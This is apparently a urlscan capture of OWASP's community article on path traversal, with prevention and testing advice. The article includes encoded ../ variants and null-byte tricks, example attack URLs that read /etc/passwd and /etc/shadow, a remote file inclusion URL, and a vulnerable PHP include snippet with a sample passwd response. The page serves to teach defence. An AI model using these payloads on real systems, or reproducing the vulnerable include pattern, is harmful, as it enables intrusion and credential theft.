owasp.org
Open in
urlscan Pro
2606:4700:10::6816:1b4d
Public Scan
Submitted URL: http://www.owasp.org/index.php/Path_Traversal
Effective URL: https://owasp.org/www-community/attacks/Path_Traversal
Submission Tags: falconsandbox
Submission: On July 17 via api from US — Scanned from DE
Effective URL: https://owasp.org/www-community/attacks/Path_Traversal
Submission Tags: falconsandbox
Submission: On July 17 via api from US — Scanned from DE
Form analysis 2 forms found in the DOM
GET https://owasp.org/search
<form role="search" method="get" action="https://owasp.org/search">
<div class="search-div"><input id="searchString" aria-label="search input" name="searchString" class="search-bar" type="search" placeholder="Search OWASP.org" required="true"><button id="search-button" aria-label="search button" type="submit"
class="fa fa-search" style="padding-left: 8px;"></button></div>
</form>GET https://owasp.org/search
<form style="display:inline-block;" role="search" method="get" action="https://owasp.org/search">
<div class="search-div"><input id="searchString" name="searchString" class="mini-search-bar" type="search" placeholder="Search OWASP.org" required="true"><button id="search-button" type="submit" class="fa fa-search"></button></div>
</form>Text Content
For full functionality of this site it is necessary to enable JavaScript. Here
are the instructions how to enable JavaScript in your web browser.
Please support the OWASP mission to improve software security through open
source initiatives and community education. Donate Now!
*
*
PROJECTS
* Browse All Projects...
* OWASP Top Ten
* Dependency Track
* Juice Shop
* Mobile Application Security
* ModSecurity Core Rule Set
* Software Assurance Maturity Model (SAMM)
* Web Security Testing Guide
* Start a New Project...
* Community Contributions
* Google Summer of Code 2023
CHAPTERS
* Find a Local Chapter...
* Africa
* Asia
* Caribbean
* Central America
* Europe
* North America
* Oceania
* South America
* Start a Local Chapter...
EVENTS
* OWASP Italy Day 2024
* OWASP Global AppSec Lisbon 2024
* OWASP Global AppSec San Francisco 2024
* OWASP Developer Day San Francisco 2024
* OWASP AppSec Days Singapore 2024
* OWASP LASCON 2024
* OWASP BeNeLux 2024
* Upcoming Chapter Events
* Browse All Events...
ABOUT
* About OWASP
* Awards
* Careers
* Committees
* Contact Us
* Contributed Content
* Corporate Supporters
* Donate
* Finance
* Get OWASP Gear
* Global Board
* Global Board EU
* Governance
* Membership
* Membership Portal
* Opinions & News
* Policies
* Staff
* Staff Projects & Procedures
* Subscribe to our Mailing List
* Video
* MAKE A DONATION
* BECOME A MEMBER
* SITEMAP
* PROJECTS
* Browse All Projects...
* OWASP Top Ten
* Dependency Track
* Juice Shop
* Mobile Application Security
* ModSecurity Core Rule Set
* Software Assurance Maturity Model (SAMM)
* Web Security Testing Guide
* Start a New Project...
* Community Contributions
* Google Summer of Code 2023
* CHAPTERS
* Find a Local Chapter...
* Africa
* Asia
* Caribbean
* Central America
* Europe
* North America
* Oceania
* South America
* Start a Local Chapter...
* EVENTS
* OWASP Italy Day 2024
* OWASP Global AppSec Lisbon 2024
* OWASP Global AppSec San Francisco 2024
* OWASP Developer Day San Francisco 2024
* OWASP AppSec Days Singapore 2024
* OWASP LASCON 2024
* OWASP BeNeLux 2024
* Upcoming Chapter Events
* Browse All Events...
* ABOUT
* About OWASP
* Awards
* Careers
* Committees
* Contact Us
* Contributed Content
* Corporate Supporters
* Donate
* Finance
* Get OWASP Gear
* Global Board
* Global Board EU
* Governance
* Membership
* Membership Portal
* Opinions & News
* Policies
* Staff
* Staff Projects & Procedures
* Subscribe to our Mailing List
* Video
* *
Store Donate Join
This website uses cookies to analyze our traffic and only share that information
with our analytics partners.
Accept
x
Store
Donate
Join
PATH TRAVERSAL
OVERVIEW
A path traversal attack (also known as directory traversal) aims to access files
and directories that are stored outside the web root folder. By manipulating
variables that reference files with “dot-dot-slash (../)” sequences and its
variations or by using absolute file paths, it may be possible to access
arbitrary files and directories stored on file system including application
source code or configuration and critical system files. It should be noted that
access to files is limited by system operational access control (such as in the
case of locked or in-use files on the Microsoft Windows operating system).
This attack is also known as “dot-dot-slash”, “directory traversal”, “directory
climbing” and “backtracking”.
RELATED SECURITY ACTIVITIES
HOW TO AVOID PATH TRAVERSAL VULNERABILITIES
All but the most simple web applications have to include local resources, such
as images, themes, other scripts, and so on. Every time a resource or file is
included by the application, there is a risk that an attacker may be able to
include a file or remote resource you didn’t authorize.
HOW TO IDENTIFY IF YOU ARE VULNERABLE
* Be sure you understand how the underlying operating system will process
filenames handed off to it.
* Don’t store sensitive configuration files inside the web root
* For Windows IIS servers, the web root should not be on the system disk, to
prevent recursive traversal back to system directories.
HOW TO PROTECT YOURSELF
* Prefer working without user input when using file system calls
* Use indexes rather than actual portions of file names when templating or
using language files (ie value 5 from the user submission = Czechoslovakian,
rather than expecting the user to return “Czechoslovakian”)
* Ensure the user cannot supply all parts of the path – surround it with your
path code
* Validate the user’s input by only accepting known good – do not sanitize the
data
* Use chrooted jails and code access policies to restrict where the files can
be obtained or saved to
* If forced to use user input for file operations, normalize the input before
using in file io API’s, such as normalize().
HOW TO TEST FOR PATH TRAVERSAL VULNERABILITIES
See the OWASP Testing Guide article on how to test for path traversal
vulnerabilities.
DESCRIPTION
REQUEST VARIATIONS
Encoding and double encoding:
* %2e%2e%2f represents ../
* %2e%2e/ represents ../
* ..%2f represents ../
* %2e%2e%5c represents ..\
* %2e%2e\ represents ..\
* ..%5c represents ..\
* %252e%252e%255c represents ..\
* ..%255c represents ..\
and so on.
PERCENT ENCODING (AKA URL ENCODING)
Note that web containers perform one level of decoding on percent encoded values
from forms and URLs.
* ..%c0%af represents ../
* ..%c1%9c represents ..\
OS SPECIFIC
UNIX
Root directory: “ / “
Directory separator: “ / “
WINDOWS
Root directory: “ <partition letter> : \ “
Directory separator: “ / “ or “ \ ”
Note that windows allows filenames to be followed by extra . \ / characters.
In many operating systems, null bytes %00 can be injected to terminate the
filename. For example, sending a parameter like:
?file=secret.doc%00.pdf
will result in the Java application seeing a string that ends with “.pdf” and
the operating system will see a file that ends in “.doc”. Attackers may use this
trick to bypass validation routines.
EXAMPLES
EXAMPLE 1
The following examples show how the application deals with the resources in use.
http://some_site.com.br/get-files.jsp?file=report.pdf
http://some_site.com.br/get-page.php?home=aaa.html
http://some_site.com.br/some-page.asp?page=index.html
In these examples it’s possible to insert a malicious string as the variable
parameter to access files located outside the web publish directory.
http://some_site.com.br/get-files?file=../../../../some dir/some file
http://some_site.com.br/../../../../some dir/some file
The following URLs show examples of *NIX password file exploitation.
http://some_site.com.br/../../../../etc/shadow
http://some_site.com.br/get-files?file=/etc/passwd
Note: In a Windows system an attacker can navigate only in a partition that
locates web root while in the Linux they can navigate in the whole disk.
EXAMPLE 2
It’s also possible to include files and scripts located on external website.
http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php
EXAMPLE 3
These examples illustrate a case when an attacker made the server show the CGI
source code.
http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi
EXAMPLE 4
This example was extracted from: Wikipedia - Directory Traversal
A typical example of vulnerable application code is:
<?php
$template = 'blue.php';
if ( is_set( $_COOKIE['TEMPLATE'] ) )
$template = $_COOKIE['TEMPLATE'];
include ( "/home/users/phpguru/templates/" . $template );
?>
An attack against this system could be to send the following HTTP request:
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Generating a server response such as:
HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache
root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh
daemon:*:1:1::/tmp:
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
The repeated ../ characters after /home/users/phpguru/templates/ has caused
include() to traverse to the root directory, and then include the UNIX password
file /etc/passwd.
UNIX etc/passwd is a common file used to demonstrate directory traversal, as it
is often used by crackers to try cracking the passwords.
ABSOLUTE PATH TRAVERSAL
The following URLs may be vulnerable to this attack:
http://testsite.com/get.php?f=list
http://testsite.com/get.cgi?f=2
http://testsite.com/get.asp?f=test
An attacker can execute this attack like this:
http://testsite.com/get.php?f=/var/www/html/get.php
http://testsite.com/get.cgi?f=/var/www/html/admin/get.inc
http://testsite.com/get.asp?f=/etc/passwd
When the web server returns information about errors in a web application, it is
much easier for the attacker to guess the correct locations (e.g. path to the
file with a source code, which then may be displayed).
RELATED ATTACKS
* Path Manipulation
* Relative Path Traversal
* Resource Injection
RELATED VULNERABILITIES
* Improper Data Validation
RELATED CONTROLS
* Input Validation Cheat Sheet
REFERENCES
* http://cwe.mitre.org/data/definitions/22.html
* http://www.webappsec.org/projects/threat/classes/path_traversal.shtml
--------------------------------------------------------------------------------
Edit on GitHub
The OWASP® Foundation works to improve the security of software through its
community-led open source software projects, hundreds of chapters worldwide,
tens of thousands of members, and by hosting local and global conferences.
IMPORTANT COMMUNITY LINKS
* Community
* Attacks (You are here)
* Vulnerabilities
* Controls
UPCOMING OWASP GLOBAL EVENTS
* OWASP Global AppSec San Francisco 2024
* September 23-27, 2024
* OWASP Developer Day 2024
* September 25, 2024
* OWASP Global AppSec Washington DC 2025
* November 3-7, 2025
* OWASP Global AppSec San Francisco 2026
* November 2-6, 2026
SPOTLIGHT: SALT SECURITY
Salt Security makes it safe to innovate by protecting the APIs at the core of
every SaaS, web, mobile, microservices and IoT application. Our API Protection
Platform is deployed in minutes, and requires no configuration or customization.
We use patented behavioral protection to automatically and continuously discover
and learn the granular behavior of each unique API to ensure protection. The
company was founded in 2016 by alumni of the Israeli Defense Forces (IDF) and
serial cybersecurity executives. In 2019 Salt Security was selected as a
finalist for the RSA Innovation Sandbox and as the winner of the OWASP
Innovation Fair.
CORPORATE SUPPORTERS
Become a corporate supporter
* HOME
* PROJECTS
* CHAPTERS
* EVENTS
* ABOUT
* PRIVACY
* SITEMAP
* CONTACT
OWASP, the OWASP logo, and Global AppSec are registered trademarks and AppSec
Days, AppSec California, AppSec Cali, SnowFROC, and LASCON are trademarks of the
OWASP Foundation, Inc. Unless otherwise specified, all content on the site is
Creative Commons Attribution-ShareAlike v4.0 and provided without warranty of
service or accuracy. For more information, please refer to our General
Disclaimer. OWASP does not endorse or recommend commercial products or services,
allowing our community to remain vendor neutral with the collective wisdom of
the best minds in software security worldwide. Copyright 2024, OWASP Foundation,
Inc.